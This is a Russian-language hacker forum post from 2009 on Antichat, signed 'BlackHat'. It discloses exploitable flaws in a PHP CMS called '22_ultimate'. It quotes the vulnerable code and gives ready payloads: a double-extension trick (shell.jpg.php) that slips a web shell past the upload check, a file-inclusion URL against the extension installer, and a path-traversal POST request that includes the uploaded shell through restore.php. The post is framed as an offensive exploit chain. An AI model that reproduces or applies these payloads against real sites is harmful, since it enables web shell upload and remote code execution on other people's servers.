14.04.2009, 22:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
Продолжим (:
http://localhost/22_ultimate/admin/?cmd=gallery.images
[/admin/gallery/upload.php 50 line]
Мега защита =)
PHP код:
$rozdeleni = explode(".", $_FILES['image']['name'][$i]);
if($rozdeleni[1] == "jpg" or $rozdeleni[1] == "JPG")
{
Если у нас shell.jpg.php, то:
Код:
Array ( [0] => shell [1] => jpg [2] => php )
Опять таки Заливка шелла. Проблема что заливается с расширением Array[1].
RFI
Рассмотрим admin\acp\extensions\index.php
Существует вот такой вот код.
PHP код:
if($_GET['op'] == 'install') {
$cms_root = '../';
$path = '../ext/install.' . $_GET['ext'] . '.php';
$chksum = md5_file($path);
if(file_exists($path)) {
$result=sql_query("SELECT chksum FROM ".$SQL_PREFIX."_ext WHERE chksum = '" . $chksum . "';");
$row_array = sql_fetch_row($result);
if($row_array[0] != $chksum) {
include($path);
Есть инклуд Обращаемся к скрипту:
index.php?op=install&ext=[path]
$chksum - ето у нас путь в md5.
Скрипт не может сделать sql_query, так как нет такого класа. Следовательно sql_fetch_row не выполнится тоже, а $row_array[0] не будет ровно $chksum. Имеем include($path);
LFI
/admin/acp/restore/restore.php
PHP код:
elseif(isset($_POST['download']))
{
header('Content-Description: File Transfer');
header('Content-Type: text/x-sql');
header('Content-Disposition: attachment; filename="'. $_POST['file'] .'.sql"');
include('../store/'. $_POST['file'] .'.sql');
}
POST file=../../../gallery/data/{nameofgallery}/full/shell.jpg}&download=
__________________
BlackHat. MoDL
Последний раз редактировалось Dimi4; 14.04.2009 в 23:01..
|
|
|